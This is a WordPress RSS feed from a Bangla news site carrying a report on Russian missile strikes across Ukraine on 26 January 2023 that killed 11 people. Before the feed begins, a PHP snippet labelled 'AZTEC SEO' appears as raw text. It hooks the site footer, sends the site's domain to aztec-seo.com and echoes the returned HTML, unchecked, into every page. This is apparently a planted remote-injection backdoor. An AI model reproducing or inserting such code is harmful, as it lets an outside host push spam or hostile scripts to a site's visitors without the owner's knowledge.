/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ক্ষেপণাস্ত্র – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Fri, 27 Jan 2023 04:59:22 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 রাশিয়ার ৫৫ ক্ষেপণাস্ত্র হামলায় একদিনে ১১ জন নিহত https://www.dhakaskynews.com/international/2023/01/27/News_ID-3825/ https://www.dhakaskynews.com/international/2023/01/27/News_ID-3825/#respond Fri, 27 Jan 2023 04:59:22 +0000 https://www.dhakaskynews.com/?p=3825 ইউক্রেনের রাজধানী কিয়েভসহ দেশটির বিভিন্ন শহরে একের পর এক ক্ষেপণাস্ত্র হামলা চালিয়েছে রাশিয়া। রাশিয়া একদিনেই ৫৫টি ক্ষেপণাস্ত্র ছুড়েছে বলে দাবি করেছে ইউক্রেন। ইউক্রেনের জ্বালানি অবকাঠামো লক্ষ্য করে ২৬ জানুয়ারি বৃহস্পতিবার রাশিয়ার একের পর এক ক্ষেপণাস্ত্র হামলায় ১১ জন নিহতের খবর পাওয়া গেছে। খবর এএফপির।

যুক্তরাষ্ট্র ও জার্মানির পক্ষ থেকে ইউক্রেনকে ট্যাংক দেওয়ার ঘোষণার পর রাশিয়া আরও মারমুখী হয়ে উঠেছে। আর এর পরই এ ধরনের ক্ষেপণাস্ত্র হামলা শুরু করেছে রুশ বাহিনী। ইউক্রেনের জরুরি বিভাগ জানায়, এসব হামলায় আরও ১১ জন আহত হয়েছেন। এর মধ্যে রাজধানী কিয়েভে ক্ষেপণাস্ত্রের টুকরার আঘাতে ৫৫ বছর বয়সি একজনের মৃত্যু হয়েছে। দেশটির আকাশ প্রতিরক্ষাব্যবস্থা ওই ক্ষেপণাস্ত্র ধ্বংস করেছিল।

গতকাল একদিনে কিয়েভ, বাখমুতসহ ইউক্রেনের বিভিন্ন শহরে রাশিয়া ৫৫টি ক্ষেপণাস্ত্র ছুড়েছে বলে জানিয়েছে ইউক্রেনের সেনাবাহিনী। এর মধ্যে ৪৭টি ক্ষেপণাস্ত্র ধ্বংস করার দাবি করেছে তারা। এ ছাড়া ওডেসায় বিদ্যুৎ অবকাঠামোর ওপর হামলার ঘটনাও ঘটেছে।

]]>
https://www.dhakaskynews.com/international/2023/01/27/News_ID-3825/feed/ 0